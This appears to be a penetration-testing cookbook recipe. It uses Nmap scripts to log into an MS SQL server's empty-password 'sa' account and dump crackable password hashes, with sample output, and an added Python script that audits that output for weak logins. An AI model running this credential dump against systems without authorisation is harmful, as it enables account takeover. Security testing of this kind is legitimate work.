After gaining access to an MS SQL server, we can dump all of its password hashes in order to compromise other accounts. Nmap can retrieve these hashes in a format usable by the cracking tool John the Ripper.
This recipe shows how to dump crackable password hashes from an MS SQL server with Nmap.
To dump all the password hashes of an MS SQL server with an empty sysadmin password, run the following Nmap command:
$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
The password hashes will be included in the ms-sql-dump-hashes script output section:
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2011
Service Info: CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-empty-password:
|   [192.168.1.102MSSQLSERVER]
|_    sa:<empty> => Login Success
| ms-sql-dump-hashes:
|   [192.168.1.102MSSQLSERVER]
|     sa:0x020039AE3752898DF2D260F2D4DC7F09AB9E47BAB2EA3E1A472F49520C26E206D0613E34E92BF929F53C463C5B7DED53738A7FC0790DD68CF1565469207A50F98998C7E5C610
|     ##MS_PolicyEventProcessingLogin##:0x0200BB8897EC23F14FC9FB8BFB0A96B2F541ED81F1103FD0FECB94D269BE15889377B69AEE4916307F3701C4A61F0DFD9946209258A4519FE16D9204580068D2011F8FBA7AD4
|_    ##MS_PolicyTsqlExecutionLogin##:0x0200FEAF95E21A02AE55D76F68067DB02DB59AE84FAD97EBA7461CB103361598D3683688F83019E931442EC3FB6342050EFE6ACE4E9568F69D4FD4557C2C443243E240E66E10
MS SQL servers usually run on TCP port 1433. The arguments -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes run the script ms-sql-empty-password, which checks whether the sysadmin account (sa) has an empty password, and then run the script ms-sql-dump-hashes if an MS SQL server is found running on port 1433.
The script ms-sql-dump-hashes was written by Patrik Karlsson, and its function is to retrieve the password hashes of MS SQL servers in a format usable by cracking tools such as John the Ripper. This script depends on the mssql library; you can learn more about it at http://nmap.org/nsedoc/lib/mssql.html.
If an SMB port is open, you can use it to run this script over named pipes instead, by setting the script argument mssql.instance-all or mssql.instance-name (for example, --script-args mssql.instance-all):
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| ms-sql-empty-password:
|   [192.168.1.102MSSQLSERVER]
|_    sa:<empty> => Login Success
| ms-sql-dump-hashes:
|   [192.168.1.102MSSQLSERVER]
|     sa:0x020039AE3752898DF2D260F2D4DC7F09AB9E47BAB2EA3E1A472F49520C26E206D0613E34E92BF929F53C463C5B7DED53738A7FC0790DD68CF1565469207A50F98998C7E5C610
|     ##MS_PolicyEventProcessingLogin##:0x0200BB8897EC23F14FC9FB8BFB0A96B2F541ED81F1103FD0FECB94D269BE15889377B69AEE4916307F3701C4A61F0DFD9946209258A4519FE16D9204580068D2011F8FBA7AD4
|_    ##MS_PolicyTsqlExecutionLogin##:0x0200FEAF95E21A02AE55D76F68067DB02DB59AE84FAD97EBA7461CB103361598D3683688F83019E931442EC3FB6342050EFE6ACE4E9568F69D4FD4557C2C443243E240E66E10
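As an added example (not code from the recipe or from the Nmap project), the following Python script parses the ms-sql-empty-password and ms-sql-dump-hashes output shown above, splits each stored hash into its version, salt and digest, and reports the logins that need attention: an empty password, or a hash that is not SHA-512. The hash layout it assumes (2-byte version 0x0100 for SHA-1 or 0x0200 for SHA-512, 4-byte salt, digest) is the format of the password_hash column in sys.sql_logins; the embedded sample output is copied from the recipe.

```python
import re
# password_hash layout: 2-byte version, 4-byte salt, then the digest(s). 0x0100 = SHA-1,
# one 20-byte digest (SQL Server 2005/2008) or two (SQL Server 2000). 0x0200 = SHA-512 (2012+).
HASH_VERSIONS = {0x0100: ("SHA-1", (20, 40)), 0x0200: ("SHA-512", (64,))}

def parse_hash(raw):
    """Split a 0x-prefixed password_hash value into (algorithm, salt, digest)."""
    blob = bytes.fromhex(raw[2:])
    algorithm, lengths = HASH_VERSIONS.get(int.from_bytes(blob[:2], "big"), ("unknown", None))
    if lengths is not None and len(blob) - 6 not in lengths:
        raise ValueError(f"{algorithm} hash with unexpected digest length {len(blob) - 6}")
    return algorithm, blob[2:6], blob[6:]

def parse_nse_output(output):
    """Return (logins with empty passwords, {login: (instance, algorithm, salt, digest)})."""
    empty, hashes, instance, section = [], {}, None, None
    for line in output.splitlines():
        body = re.sub(r"^\|_?\s*", "", line).strip()      # drop the "| " / "|_ " tree prefix
        if re.fullmatch(r"ms-sql-[\w-]+:", body):
            section = body[:-1]                              # start of one script's section
        elif body.startswith("[") and body.endswith("]"):
            instance = body[1:-1]                            # "[host\instance]" header line
        elif section == "ms-sql-empty-password" and "=> Login Success" in body:
            empty.append(body.split(":", 1)[0])
        elif section == "ms-sql-dump-hashes" and ":0x" in body:
            login, raw = body.rsplit(":", 1)
            hashes[login] = (instance, *parse_hash(raw))
    return empty, hashes

def weak_logins(empty, hashes):
    """Logins needing action: empty password, or a hash that is not SHA-512."""
    flagged = {login: "empty password" for login in empty}
    for login, (_, algorithm, _, _) in hashes.items():
        if algorithm != "SHA-512":
            flagged.setdefault(login, f"{algorithm} hash, not SHA-512")
    return flagged

# Sample output copied from the recipe above (two of its three hash lines).
SAMPLE = """\
Host script results:
| ms-sql-empty-password:
|   [192.168.1.102MSSQLSERVER]
|_    sa:<empty> => Login Success
| ms-sql-dump-hashes:
|   [192.168.1.102MSSQLSERVER]
|     sa:0x020039AE3752898DF2D260F2D4DC7F09AB9E47BAB2EA3E1A472F49520C26E206D0613E34E92BF929F53C463C5B7DED53738A7FC0790DD68CF1565469207A50F98998C7E5C610
|_    ##MS_PolicyTsqlExecutionLogin##:0x0200FEAF95E21A02AE55D76F68067DB02DB59AE84FAD97EBA7461CB103361598D3683688F83019E931442EC3FB6342050EFE6ACE4E9568F69D4FD4557C2C443243E240E66E10
"""
if __name__ == "__main__":
    print(weak_logins(*parse_nse_output(SAMPLE)))
```

Feed it the saved normal-format output of the scan (nmap -oN) to get the same report for a real host.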